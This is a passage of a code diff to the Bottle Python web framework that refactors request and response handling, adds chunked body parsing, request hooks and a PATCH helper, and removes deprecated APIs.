route.prepare() + self.trigger_hook('app_reset') def close(self): - ''' Close the application and all installed plugins. ''' + """ Close the application and all installed plugins. """ for plugin in self.plugins: if hasattr(plugin, 'close'): plugin.close() - self.stopped = True + + def run(self, **kwargs): + """ Calls :func:`run` with the same parameters. """ + run(self, **kwargs) def match(self, environ): """ Search for a matching route and return a (:class:`Route` , urlargs) @@ -653,21 +832,26 @@ class Bottle(object): return urljoin(urljoin('/', scriptname), location) def add_route(self, route): - ''' Add a route object, but do not change the :data:`Route.app` - attribute.''' + """ Add a route object, but do not change the :data:`Route.app` + attribute.""" self.routes.append(route) self.router.add(route.rule, route.method, route, name=route.name) if DEBUG: route.prepare() - def route(self, path=None, method='GET', callback=None, name=None, - apply=None, skip=None, **config): + def route(self, + path=None, + method='GET', + callback=None, + name=None, + apply=None, + skip=None, **config): """ A decorator to bind a function to a request URL. Example:: - @app.route('/hello/:name') + @app.route('/hello/<name>') def hello(name): return 'Hello %s' % name - The ``:name`` part is a wildcard. See :class:`Router` for syntax + The ``<name>`` part is a wildcard. See :class:`Router` for syntax details. :param path: Request path or a list of paths to listen to. If no @@ -689,16 +873,19 @@ class Bottle(object): if callable(path): path, callback = None, path plugins = makelist(apply) skiplist = makelist(skip) + def decorator(callback): - # TODO: Documentation and tests if isinstance(callback, basestring): callback = load(callback) for rule in makelist(path) or yieldroutes(callback): for verb in makelist(method): verb = verb.upper() - route = Route(self, rule, verb, callback, name=name, - plugins=plugins, skiplist=skiplist, **config) + route = Route(self, rule, verb, callback, + name=name, + plugins=plugins, + skiplist=skiplist, **config) self.add_route(route) return callback + return decorator(callback) if callback else decorator def get(self, path=None, method='GET', **options): @@ -717,62 +904,60 @@ class Bottle(object): """ Equals :meth:`route` with a ``DELETE`` method parameter. """ return self.route(path, method, **options) + def patch(self, path=None, method='PATCH', **options): + """ Equals :meth:`route` with a ``PATCH`` method parameter. """ + return self.route(path, method, **options) + def error(self, code=500): """ Decorator: Register an output handler for a HTTP error code""" + def wrapper(handler): self.error_handler[int(code)] = handler return handler + return wrapper - def hook(self, name): - """ Return a decorator that attaches a callback to a hook. Three hooks - are currently implemented: - - - before_request: Executed once before each request - - after_request: Executed once after each request - - app_reset: Called whenever :meth:`reset` is called. - """ - def wrapper(func): - self.hooks.add(name, func) - return func - return wrapper - - def handle(self, path, method='GET'): - """ (deprecated) Execute the first matching route callback and return - the result. :exc:`HTTPResponse` exceptions are caught and returned. - If :attr:`Bottle.catchall` is true, other exceptions are caught as - well and returned as :exc:`HTTPError` instances (500). - """ - depr("This method will change semantics in 0.10. Try to avoid it.") - if isinstance(path, dict): - return self._handle(path) - return self._handle({'PATH_INFO': path, 'REQUEST_METHOD': method.upper()}) - def default_error_handler(self, res): return tob(template(ERROR_PAGE_TEMPLATE, e=res)) def _handle(self, environ): + path = environ['bottle.raw_path'] = environ['PATH_INFO'] + if py3k: + environ['PATH_INFO'] = path.encode('latin1').decode('utf8', 'ignore') + + def _inner_handle(): + # Maybe pass variables as locals for better performance? + try: + route, args = self.router.match(environ) + environ['route.handle'] = route + environ['bottle.route'] = route + environ['route.url_args'] = args + return route.call(**args) + except HTTPResponse: + return _e() + except RouteReset: + route.reset() + return _inner_handle() + except (KeyboardInterrupt, SystemExit, MemoryError): + raise + except Exception: + if not self.catchall: raise + stacktrace = format_exc() + environ['wsgi.errors'].write(stacktrace) + return HTTPError(500, "Internal Server Error", _e(), stacktrace) + try: + out = None environ['bottle.app'] = self request.bind(environ) response.bind() - route, args = self.router.match(environ) - environ['route.handle'] = route - environ['bottle.route'] = route - environ['route.url_args'] = args - return route.call(**args) - except HTTPResponse: - return _e() - except RouteReset: - route.reset() - return self._handle(environ) - except (KeyboardInterrupt, SystemExit, MemoryError): - raise - except Exception: - if not self.catchall: raise - stacktrace = format_exc() - environ['wsgi.errors'].write(stacktrace) - return HTTPError(500, "Internal Server Error", _e(), stacktrace) + self.trigger_hook('before_request') + out = _inner_handle() + return out; + finally: + if isinstance(out, HTTPResponse): + out.apply(response) + self.trigger_hook('after_request') def _cast(self, out, peek=None): """ Try to convert the parameter into something WSGI compatible and set @@ -789,7 +974,7 @@ class Bottle(object): # Join lists of byte or unicode strings. Mixed lists are NOT supported if isinstance(out, (tuple, list))\ and isinstance(out[0], (bytes, unicode)): - out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' + out = out[0][0:0].join(out) # b'abc'[0:0] -> b'' # Encode unicode strings if isinstance(out, unicode): out = out.encode(response.charset) @@ -802,7 +987,8 @@ class Bottle(object): # TODO: Handle these explicitly in handle() or make them iterable. if isinstance(out, HTTPError): out.apply(response) - out = self.error_handler.get(out.status_code, self.default_error_handler)(out) + out = self.error_handler.get(out.status_code, + self.default_error_handler)(out) return self._cast(out) if isinstance(out, HTTPResponse): out.apply(response) @@ -827,7 +1013,7 @@ class Bottle(object): first = _e() except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except: if not self.catchall: raise first = HTTPError(500, 'Unhandled exception', _e(), format_exc()) @@ -843,8 +1029,7 @@ class Bottle(object): msg = 'Unsupported response type: %s' % type(first) return self._cast(HTTPError(500, msg)) if hasattr(out, 'close'): - new_iter = _iterchain(new_iter) - new_iter.close = out.close + new_iter = _closeiter(new_iter, out.close) return new_iter def wsgi(self, environ, start_response): @@ -860,7 +1045,7 @@ class Bottle(object): return out except (KeyboardInterrupt, SystemExit, MemoryError): raise - except Exception: + except: if not self.catchall: raise err = '<h1>Critical error while processing request: %s</h1>' \ % html_escape(environ.get('PATH_INFO', '/')) @@ -870,16 +1055,25 @@ class Bottle(object): % (html_escape(repr(_e())), html_escape(format_exc())) environ['wsgi.errors'].write(err) headers = [('Content-Type', 'text/html; charset=UTF-8')] - start_response('500 INTERNAL SERVER ERROR', headers) + start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info()) return [tob(err)] def __call__(self, environ, start_response): - ''' Each instance of :class:'Bottle' is a WSGI application. ''' + """ Each instance of :class:'Bottle' is a WSGI application. """ return self.wsgi(environ, start_response) + def __enter__(self): + """ Use this application as default for all module-level shortcuts. """ + default_app.push(self) + return self + def __exit__(self, exc_type, exc_value, traceback): + default_app.pop() - + def __setattr__(self, name, value): + if name in self.__dict__: + raise AttributeError("Attribute %s already defined. Plugin conflict?" % name) + self.__dict__[name] = value ############################################################################### @@ -896,12 +1090,10 @@ class BaseRequest(object): way to store and access request-specific data. """ - __slots__ = ('environ') + __slots__ = ('environ', ) #: Maximum size of memory buffer for :attr:`body` in bytes. MEMFILE_MAX = 102400 - #: Maximum number pr GET or POST parameters per request - MAX_PARAMS = 100 def __init__(self, environ=None): """ Wrap a WSGI environ dictionary. """ @@ -912,36 +1104,45 @@ class BaseRequest(object): @DictProperty('environ', 'bottle.app', read_only=True) def app(self): - ''' Bottle application handling this request. ''' + """ Bottle application handling this request. """ raise RuntimeError('This request is not connected to an application.') + @DictProperty('environ', 'bottle.route', read_only=True) + def route(self): + """ The bottle :class:`Route` object that matches this request. """ + raise RuntimeError('This request is not connected to a route.') + + @DictProperty('environ', 'route.url_args', read_only=True) + def url_args(self): + """ The arguments extracted from the URL. """ + raise RuntimeError('This request is not connected to a route.') + @property def path(self): - ''' The value of ``PATH_INFO`` with exactly one prefixed slash (to fix - broken clients and avoid the "empty path" edge case). ''' - return '/' + self.environ.get('PATH_INFO','').lstrip('/') + """ The value of ``PATH_INFO`` with exactly one prefixed slash (to fix + broken clients and avoid the "empty path" edge case). """ + return '/' + self.environ.get('PATH_INFO', '').lstrip('/') @property def method(self): - ''' The ``REQUEST_METHOD`` value as an uppercase string. ''' + """ The ``REQUEST_METHOD`` value as an uppercase string. """ return self.environ.get('REQUEST_METHOD', 'GET').upper() @DictProperty('environ', 'bottle.request.headers', read_only=True) def headers(self): - ''' A :class:`WSGIHeaderDict` that provides case-insensitive access to - HTTP request headers. ''' + """ A :class:`WSGIHeaderDict` that provides case-insensitive access to + HTTP request headers. """ return WSGIHeaderDict(self.environ) def get_header(self, name, default=None): - ''' Return the value of a request header, or a given default value. ''' + """ Return the value of a request header, or a given default value. """ return self.headers.get(name, default) @DictProperty('environ', 'bottle.request.cookies', read_only=True) def cookies(self): """ Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT decoded. Use :meth:`get_cookie` if you expect signed cookies. """ - cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')) - cookies = list(cookies.values())[:self.MAX_PARAMS] + cookies = SimpleCookie(self.environ.get('HTTP_COOKIE', '')).values() return FormsDict((c.key, c.value) for c in cookies) def get_cookie(self, key, default=None, secret=None): @@ -951,31 +1152,31 @@ class BaseRequest(object): cookie or wrong signature), return a default value. """ value = self.cookies.get(key) if secret and value: - dec = cookie_decode(value, secret) # (key, value) tuple or None + dec = cookie_decode(value, secret) # (key, value) tuple or None return dec[1] if dec and dec[0] == key else default return value or default @DictProperty('environ', 'bottle.request.query', read_only=True) def query(self): - ''' The :attr:`query_string` parsed into a :class:`FormsDict`. These + """ The :attr:`query_string` parsed into a :class:`FormsDict`. These values are sometimes called "URL arguments" or "GET parameters", but not to be confused with "URL wildcards" as they are provided by the - :class:`Router`. ''' + :class:`Router`. """ get = self.environ['bottle.get'] = FormsDict() pairs = _parse_qsl(self.environ.get('QUERY_STRING', '')) - for key, value in pairs[:self.MAX_PARAMS]: + for key, value in pairs: get[key] = value return get @DictProperty('environ', 'bottle.request.forms', read_only=True) def forms(self): """ Form values parsed from an `url-encoded` or `multipart/form-data` - encoded POST or PUT request body. The result is retuned as a + encoded POST or PUT request body. The result is returned as a :class:`FormsDict`. All keys and values are strings. File uploads are stored separately in :attr:`files`. """ forms = FormsDict() for name, item in self.POST.allitems(): - if not hasattr(item, 'filename'): + if not isinstance(item, FileUpload): forms[name] = item return forms @@ -992,52 +1193,102 @@ class BaseRequest(object): @DictProperty('environ', 'bottle.request.files', read_only=True) def files(self): - """ File uploads parsed from an `url-encoded` or `multipart/form-data` - encoded POST or PUT request body. The values are instances of - :class:`cgi.FieldStorage`. The most important attributes are: + """ File uploads parsed from `multipart/form-data` encoded POST or PUT + request body. The values are instances of :class:`FileUpload`. - filename - The filename, if specified; otherwise None; this is the client - side filename, *not* the file name on which it is stored (that's - a temporary file you don't deal with) - file - The file(-like) object from which you can read the data. - value - The value as a *string*; for file uploads, this transparently - reads the file every time you request the value. Do not do this - on big files. """ files = FormsDict() for name, item in self.POST.allitems(): - if hasattr(item, 'filename'): + if isinstance(item, FileUpload): files[name] = item return files @DictProperty('environ', 'bottle.request.json', read_only=True) def json(self): - ''' If the ``Content-Type`` header is ``application/json``, this + """ If the ``Content-Type`` header is ``application/json``, this property holds the parsed content of the request body. Only requests smaller than :attr:`MEMFILE_MAX` are processed to avoid memory - exhaustion. ''' - if 'application/json' in self.environ.get('CONTENT_TYPE', '') \ - and 0 < self.content_length < self.MEMFILE_MAX: - return json_loads(self.body.read(self.MEMFILE_MAX)) + exhaustion. Invalid JSON raises a 400 error response. """ + ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0] + if ctype == 'application/json': + b = self._get_body_string() + if not b: + return None + try: + return json_loads(b) + except (ValueError, TypeError): + raise HTTPError(400, 'Invalid JSON') return None + def _iter_body(self, read, bufsize): + maxread = max(0, self.content_length) + while maxread: + part = read(min(maxread, bufsize)) + if not part: break + yield part + maxread -= len(part) + + @staticmethod + def _iter_chunked(read, bufsize): + err = HTTPError(400, 'Error while parsing chunked transfer body.') + rn, sem, bs = tob('\r\n'), tob(';'), tob('') + while True: + header = read(1) + while header[-2:] != rn: + c = read(1) + header += c + if not c: raise err + if len(header) > bufsize: raise err + size, _, _ = header.partition(sem) + try: + maxread = int(tonat(size.strip()), 16) + except ValueError: + raise err + if maxread == 0: break + buff = bs + while maxread > 0: + if not buff: + buff = read(min(maxread, bufsize)) + part, buff = buff[:maxread], buff[maxread:] + if not part: raise err + yield part + maxread -= len(part) + if read(2) != rn: + raise err + @DictProperty('environ', 'bottle.request.body', read_only=True) def _body(self): - maxread = max(0, self.content_length) - stream = self.environ['wsgi.input'] - body = BytesIO() if maxread < self.MEMFILE_MAX else TemporaryFile(mode='w+b') - while maxread > 0: - part = stream.read(min(maxread, self.MEMFILE_MAX)) - if not part: break + try: + read_func = self.environ['wsgi.input'].read + except KeyError: + self.environ['wsgi.input'] = BytesIO() + return self.environ['wsgi.input'] + body_iter = self._iter_chunked if self.chunked else self._iter_body + body, body_size, is_temp_file = BytesIO(), 0, False + for part in body_iter(read_func, self.MEMFILE_MAX): body.write(part) - maxread -= len(part) + body_size += len(part) + if not is_temp_file and body_size > self.MEMFILE_MAX: + body, tmp = TemporaryFile(mode='w+b'), body + body.write(tmp.getvalue()) + del tmp + is_temp_file = True self.environ['wsgi.input'] = body body.seek(0) return body + def _get_body_string(self): + """ read body until content-length or MEMFILE_MAX into a string. Raise + HTTPError(413) on requests that are to large. """ + clen = self.content_length + if clen > self.MEMFILE_MAX: + raise HTTPError(413, 'Request entity too large') + if clen < 0: clen = self.MEMFILE_MAX + 1 + data = self.body.read(clen) + if len(data) > self.MEMFILE_MAX: # Fail fast + raise HTTPError(413, 'Request entity too large') + return data + @property def body(self): """ The HTTP request body as a seek-able file-like object. Depending on @@ -1048,6 +1299,12 @@ class BaseRequest(object): self._body.seek(0) return self._body + @property + def chunked(self): + """ True if Chunked transfer encoding was. """ + return 'chunked' in self.environ.get( + 'HTTP_TRANSFER_ENCODING', '').lower() + #: An alias for :attr:`query`. GET = query @@ -1061,32 +1318,32 @@ class BaseRequest(object): # We default to application/x-www-form-urlencoded for everything that # is not multipart and take the fast path (also: 3.1 workaround) if not self.content_type.startswith('multipart/'): - maxlen = max(0, min(self.content_length, self.MEMFILE_MAX)) - pairs = _parse_qsl(tonat(self.body.read(maxlen), 'latin1')) - for key, value in pairs[:self.MAX_PARAMS]: + pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1')) + for key, value in pairs: post[key] = value return post - safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi + safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'): if key in self.environ: safe_env[key] = self.environ[key] args = dict(fp=self.body, environ=safe_env, keep_blank_values=True) if py31: - args['fp'] = NCTextIOWrapper(args['fp'], encoding='ISO-8859-1', + args['fp'] = NCTextIOWrapper(args['fp'], + encoding='utf8', newline='\n') elif py3k: - args['encoding'] = 'ISO-8859-1' - data = FieldStorage(**args) - for item in (data.list or [])[:self.MAX_PARAMS]: - post[item.name] = item if item.filename else item.value + args['encoding'] = 'utf8' + data = cgi.FieldStorage(**args) + self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394 + data = data.list or [] + for item in data: + if item.filename: + post[item.name] = FileUpload(item.file, item.name, + item.filename, item.headers) + else: + post[item.name] = item.value return post - @property - def COOKIES(self): - ''' Alias for :attr:`cookies` (deprecated). ''' - depr('BaseRequest.COOKIES was renamed to BaseRequest.cookies (lowercase).') - return self.cookies - @property def url(self): """ The full request URI including hostname and scheme. If your app @@ -1097,12 +1354,13 @@ class BaseRequest(object): @DictProperty('environ', 'bottle.request.urlparts', read_only=True) def urlparts(self): - ''' The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. + """ The :attr:`url` string as an :class:`urlparse.SplitResult` tuple. The tuple contains (scheme, host, path, query_string and fragment), but the fragment is always empty because it is not visible to the - server. ''' + server. """ env = self.environ - http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http') + http = env.get('HTTP_X_FORWARDED_PROTO') \ + or env.get('wsgi.url_scheme', 'http') host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST') if not host: # HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients. @@ -1126,46 +1384,46 @@ class BaseRequest(object): @property def script_name(self): - ''' The initial portion of the URL's `path` that was removed by a higher + """ The initial portion of the URL's `path` that was removed by a higher level (server or routing middleware) before the application was called. This script path is returned with leading and tailing - slashes. ''' + slashes. """ script_name = self.environ.get('SCRIPT_NAME', '').strip('/') return '/' + script_name + '/' if script_name else '/' def path_shift(self, shift=1): - ''' Shift path segments from :attr:`path` to :attr:`script_name` and + """ Shift path segments from :attr:`path` to :attr:`script_name` and vice versa. :param shift: The number of path segments to shift. May be negative to change the shift direction. (default: 1) - ''' - script = self.environ.get('SCRIPT_NAME','/') - self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift) + """ + script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift) + self['SCRIPT_NAME'], self['PATH_INFO'] = script, path @property def content_length(self): - ''' The request body length as an integer. The client is responsible to + """ The request body length as an integer. The client is responsible to set this header. Otherwise, the real length of the body is unknown - and -1 is returned. In this case, :attr:`body` will be empty. ''' + and -1 is returned. In this case, :attr:`body` will be empty. """ return int(self.environ.get('CONTENT_LENGTH') or -1) @property def content_type(self): - ''' The Content-Type header as a lowercase-string (default: empty). ''' + """ The Content-Type header as a lowercase-string (default: empty). """ return self.environ.get('CONTENT_TYPE', '').lower() @property def is_xhr(self): - ''' True if the request was triggered by a XMLHttpRequest. This only + """ True if the request was triggered by a XMLHttpRequest. This only works with JavaScript libraries that support the `X-Requested-With` - header (most of the popular libraries do). ''' - requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','') + header (most of the popular libraries do). """ + requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '') return requested_with.lower() == 'xmlhttprequest' @property def is_ajax(self): - ''' Alias for :attr:`is_xhr`. "Ajax" is not the right term. ''' + """ Alias for :attr:`is_xhr`. "Ajax" is not the right term. """ return self.is_xhr @property @@ -1176,7 +1434,7 @@ class BaseRequest(object): front web-server or a middleware), the password field is None, but the user field is looked up from the ``REMOTE_USER`` environ variable. On any errors, None is returned. """ - basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION','')) + basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', '')) if basic: return basic ruser = self.environ.get('REMOTE_USER') if ruser: return (ruser, None) @@ -1204,12 +1462,25 @@ class BaseRequest(object): """ Return a new :class:`Request` with a shallow :attr:`environ` copy. """ return Request(self.environ.copy()) - def get(self, value, default=None): return self.environ.get(value, default) - def __getitem__(self, key): return self.environ[key] - def __delitem__(self, key): self[key] = ""; del(self.environ[key]) - def __iter__(self): return iter(self.environ) - def __len__(self): return len(self.environ) - def keys(self): return self.environ.keys() + def get(self, value, default=None): + return self.environ.get(value, default) + + def __getitem__(self, key): + return self.environ[key] + + def __delitem__(self, key): + self[key] = "" + del (self.environ[key]) + + def __iter__(self): + return iter(self.environ) + + def __len__(self): + return len(self.environ) + + def keys(self): + return self.environ.keys() + def __setitem__(self, key, value): """ Change an environ value and clear all caches that depend on it. """ @@ -1227,28 +1498,34 @@ class BaseRequest(object): todelete = ('headers', 'cookies') for key in todelete: - self.environ.pop('bottle.request.'+key, None) + self.environ.pop('bottle.request.' + key, None) def __repr__(self): return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url) def __getattr__(self, name): - ''' Search in self.environ for additional user defined attributes. ''' + """ Search in self.environ for additional user defined attributes. """ try: - var = self.environ['bottle.request.ext.%s'%name] + var = self.environ['bottle.request.ext.%s' % name] return var.__get__(self) if hasattr(var, '__get__') else var except KeyError: raise AttributeError('Attribute %r not defined.' % name) def __setattr__(self, name, value): if name == 'environ': return object.__setattr__(self, name, value) - self.environ['bottle.request.ext.%s'%name] = value - - + key = 'bottle.request.ext.%s' % name + if key in self.environ: + raise AttributeError("Attribute already defined: %s" % name) + self.environ[key] = value + def __delattr__(self, name, value): + try: + del self.environ['bottle.request.ext.%s' % name] + except KeyError: + raise AttributeError("Attribute not defined: %s" % name) def _hkey(s): - return s.title().replace('_','-') + return s.title().replace('_', '-') class HeaderProperty(object): @@ -1257,7 +1534,7 @@ class HeaderProperty(object): self.reader, self.writer = reader, writer self.__doc__ = 'Current value of the %r header.' % name.title() - def __get__(self, obj, cls): + def __get__(self, obj, _): if obj is None: return self value = obj.headers.get(self.name, self.default) return self.reader(value) if self.reader else value @@ -1275,6 +1552,14 @@ class BaseResponse(object): This class does support dict-like case-insensitive item-access to headers, but is NOT a dict. Most notably, iterating over a response yields parts of the body and not the headers. + + :param body: The response body as one of the supported types. + :param status: Either an HTTP status code (e.g. 200) or a status line + including the reason phrase (e.g. '200 OK'). + :param headers: A dictionary or a list of name-value pairs. + + Additional keyword arguments are added to the list of headers. + Underscores in the header name are replaced with dashes. """ default_status = 200 @@ -1283,25 +1568,36 @@ class BaseResponse(object): # Header blacklist for specific response codes # (rfc2616 section 10.2.3 and 10.3.5) bad_headers = { - 204: set(('Content-Type',)), + 204: set(('Content-Type', )), 304: set(('Allow', 'Content-Encoding', 'Content-Language', 'Content-Length', 'Content-Range', 'Content-Type', - 'Content-Md5', 'Last-Modified'))} + 'Content-Md5', 'Last-Modified')) + } - def __init__(self, body='', status=None, **headers): + def __init__(self, body='', status=None, headers=None, **more_headers): self._cookies = None - self._headers = {'Content-Type': [self.default_content_type]} + self._headers = {} self.body = body self.status = status or self.default_status if headers: - for name, value in headers.items(): - self[name] = value + if isinstance(headers, dict): + headers = headers.items() + for name, value in headers: + self.add_header(name, value) + if more_headers: + for name, value in more_headers.items(): + self.add_header(name, value) - def copy(self): - ''' Returns a copy of self. ''' - copy = Response() + def copy(self, cls=None): + """ Returns a copy of self. """ + cls = cls or BaseResponse + assert issubclass(cls, BaseResponse) + copy = cls() copy.status = self.status copy._headers = dict((k, v[:]) for (k, v) in self._headers.items()) + if self._cookies: + copy._cookies = SimpleCookie() + copy._cookies.load(self._cookies.output(header='')) return copy def __iter__(self): @@ -1313,12 +1609,12 @@ class BaseResponse(object): @property def status_line(self): - ''' The HTTP status line as a string (e.g. ``404 Not Found``).''' + """ The HTTP status line as a string (e.g. ``404 Not Found``).""" return self._status_line @property def status_code(self): - ''' The HTTP status code as an integer (e.g. 404).''' + """ The HTTP status code as an integer (e.g. 404).""" return self._status_code def _set_status(self, status): @@ -1326,17 +1622,19 @@ class BaseResponse(object): code, status = status, _HTTP_STATUS_LINES.get(status) elif ' ' in status: status = status.strip() - code = int(status.split()[0]) + code = int(status.split()[0]) else: raise ValueError('String status line without a reason phrase.') - if not 100 <= code <= 999: raise ValueError('Status code out of range.') + if not 100 <= code <= 999: + raise ValueError('Status code out of range.') self._status_code = code self._status_line = str(status or ('%d Unknown' % code)) def _get_status(self): return self._status_line - status = property(_get_status, _set_status, None, + status = property( + _get_status, _set_status, None, ''' A writeable property to change the HTTP response status. It accepts either a numeric code (100-999) or a string with a custom reason phrase (e.g. "404 Brain not found"). Both :data:`status_line` and @@ -1346,75 +1644,82 @@ class BaseResponse(object): @property def headers(self): - ''' An instance of :class:`HeaderDict`, a case-insensitive dict-like - view on the response headers. ''' + """ An instance of :class:`HeaderDict`, a case-insensitive dict-like + view on the response headers. """ hdict = HeaderDict() hdict.dict = self._headers return hdict - def __contains__(self, name): return _hkey(name) in self._headers - def __delitem__(self, name): del self._headers[_hkey(name)] - def __getitem__(self, name): return self._headers[_hkey(name)][-1] - def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)] + def __contains__(self, name): + return _hkey(name) in self._headers + + def __delitem__(self, name): + del self._headers[_hkey(name)] + + def __getitem__(self, name): + return self._headers[_hkey(name)][-1] + + def __setitem__(self, name, value): + self._headers[_hkey(name)] = [value if isinstance(value, unicode) else + str(value)] def get_header(self, name, default=None): - ''' Return the value of a previously defined header. If there is no - header with that name, return a default value. ''' + """ Return the value of a previously defined header. If there is no + header with that name, return a default value. """ return self._headers.get(_hkey(name), [default])[-1] def set_header(self, name, value): - ''' Create a new response header, replacing any previously defined - headers with the same name. ''' - self._headers[_hkey(name)] = [str(value)] + """ Create a new response header, replacing any previously defined + headers with the same name. """ + self._headers[_hkey(name)] = [value if isinstance(value, unicode) + else str(value)] def add_header(self, name, value): - ''' Add an additional response header, not removing duplicates. ''' - self._headers.setdefault(_hkey(name), []).append(str(value)) + """ Add an additional response header, not removing duplicates. """ + self._headers.setdefault(_hkey(name), []).append( + value if isinstance(value, unicode) else str(value)) def iter_headers(self): - ''' Yield (header, value) tuples, skipping headers that are not - allowed with the current response status code. ''' - return self.headerlist - - def wsgiheader(self): - depr('The wsgiheader method is deprecated. See headerlist.') #0.10 + """ Yield (header, value) tuples, skipping headers that are not + allowed with the current response status code. """ return self.headerlist @property def headerlist(self): - ''' WSGI conform list of (header, value) tuples. ''' + """ WSGI conform list of (header, value) tuples. """ out = [] - headers = self._headers.items() + headers = list(self._headers.items()) + if 'Content-Type' not in self._headers: + headers.append(('Content-Type', [self.default_content_type])) if self._status_code in self.bad_headers: bad_headers = self.bad_headers[self._status_code] headers = [h for h in headers if h[0] not in bad_headers] - out += [(name, val) for name, vals in headers for val in vals] + out += [(name, val) for (name, vals) in headers for val in vals] if self._cookies: for c in self._cookies.values(): out.append(('Set-Cookie', c.OutputString())) - return out + if py3k: + return [(k, v.encode('utf8').decode('latin1')) for (k, v) in out] + else: + return [(k, v.encode('utf8') if isinstance(v, unicode) else v) + for (k, v) in out] content_type = HeaderProperty('Content-Type') content_length = HeaderProperty('Content-Length', reader=int) + expires = HeaderProperty( + 'Expires', + reader=lambda x: datetime.utcfromtimestamp(parse_date(x)), + writer=lambda x: http_date(x)) @property - def charset(self): + def charset(self, default='UTF-8'): """ Return the charset specified in the content-type header (default: utf8). """ if 'charset=' in self.content_type: return self.content_type.split('charset=')[-1].split(';')[0].strip() - return 'UTF-8' - - @property - def COOKIES(self): - """ A dict-like SimpleCookie instance. This should not be used directly. - See :meth:`set_cookie`. """ - depr('The COOKIES dict is deprecated. Use `set_cookie()` instead.') # 0.10 - if not self._cookies: - self._cookies = SimpleCookie() - return self._cookies + return default def set_cookie(self, name, value, secret=None, **options): - ''' Create a new cookie or replace an old one. If the `secret` parameter is + """ Create a new cookie or replace an old one. If the `secret` parameter is set, create a `Signed Cookie` (described below). :param name: the name of the cookie. @@ -1445,7 +1750,7 @@ class BaseResponse(object): the content) and not copy-protected (the client can restore an old cookie). The main intention is to make pickling and unpickling save, not to store secret information at client side. - ''' + """ if not self._cookies: self._cookies = SimpleCookie() @@ -1454,7 +1759,10 @@ class BaseResponse(object): elif not isinstance(value, basestring): raise TypeError('Secret key missing for non-string Cookie.') - if len(value) > 4096: raise ValueError('Cookie value to long.') + # Cookie size plus options must not exceed 4kb. + if len(name) + len(value) > 3800: + raise ValueError('Content does not fit into a cookie.') + self._cookies[name] = value for key, value in options.items(): @@ -1467,11 +1775,13 @@ class BaseResponse(object): elif isinstance(value, (int, float)): value = time.gmtime(value) value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value) + if key in ('secure', 'httponly') and not value: + continue self._cookies[name][key.replace('_', '-')] = value def delete_cookie(self, key, **kwargs): - ''' Delete a cookie. Be sure to use the same `domain` and `path` - settings as used to create the cookie. ''' + """ Delete a cookie. Be sure to use the same `domain` and `path` + settings as used to create the cookie. """ kwargs['max_age'] = -1 kwargs['expires'] = 0 self.set_cookie(key, '', **kwargs) @@ -1482,169 +1792,132 @@ class BaseResponse(object): out += '%s: %s\n' % (name.title(), value.strip()) return out -#: Thread-local storage for :class:`LocalRequest` and :class:`LocalResponse` -#: attributes. -_lctx = threading.local() -def local_property(name): - def fget(self): +def _local_property(): + ls = threading.local() + + def fget(_): try: - return getattr(_lctx, name) + return ls.var except AttributeError: raise RuntimeError("Request context not initialized.") - def fset(self, value): setattr(_lctx, name, value) - def fdel(self): delattr(_lctx, name) - return property(fget, fset, fdel, - 'Thread-local property stored in :data:`_lctx.%s`' % name) + + def fset(_, value): + ls.var = value + + def fdel(_): + del ls.var + + return property(fget, fset, fdel, 'Thread-local property') class LocalRequest(BaseRequest): - ''' A thread-local subclass of :class:`BaseRequest` with a different - set of attribues for each thread. There is usually only one global + """ A thread-local subclass of :class:`BaseRequest` with a different + set of attributes for each thread. There is usually only one global instance of this class (:data:`request`). If accessed during a request/response cycle, this instance always refers to the *current* - request (even on a multithreaded server). ''' + request (even on a multithreaded server). """ bind = BaseRequest.__init__ - environ = local_property('request_environ') + environ = _local_property() class LocalResponse(BaseResponse): - ''' A thread-local subclass of :class:`BaseResponse` with a different - set of attribues for each thread. There is usually only one global + """ A thread-local subclass of :class:`BaseResponse` with a different + set of attributes for each thread. There is usually only one global instance of this class (:data:`response`). Its attributes are used to build the HTTP response at the end of the request/response cycle. - ''' + """ bind = BaseResponse.__init__ - _status_line = local_property('response_status_line') - _status_code = local_property('response_status_code') - _cookies = local_property('response_cookies') - _headers = local_property('response_headers') - body = local_property('response_body') + _status_line = _local_property() + _status_code = _local_property() + _cookies = _local_property() + _headers = _local_property() + body = _local_property() + Request = BaseRequest Response = BaseResponse + class HTTPResponse(Response, BottleException): - def __init__(self, body='', status=None, header=None, **headers): - if header or 'output' in headers: - depr('Call signature changed (for the better)') - if header: headers.update(header) - if 'output' in headers: body = headers.pop('output') - super(HTTPResponse, self).__init__(body, status, **headers) + def __init__(self, body='', status=None, headers=None, **more_headers): + super(HTTPResponse, self).__init__(body, status, headers, **more_headers) - def apply(self, response): - response._status_code = self._status_code - response._status_line = self._status_line - response._headers = self._headers - response._cookies = self._cookies - response.body = self.body + def apply(self, other): + other._status_code = self._status_code + other._status_line = self._status_line + other._headers = self._headers + other._cookies = self._cookies + other.body = self.body - def _output(self, value=None): - depr('Use HTTPResponse.body instead of HTTPResponse.output') - if value is None: return self.body - self.body = value - - output = property(_output, _output, doc='Alias for .body') class HTTPError(HTTPResponse): default_status = 500 - def __init__(self, status=None, body=None, exception=None, traceback=None, header=None, **headers): + + def __init__(self, + status=None, + body=None, + exception=None, + traceback=None, **more_headers): self.exception = exception self.traceback = 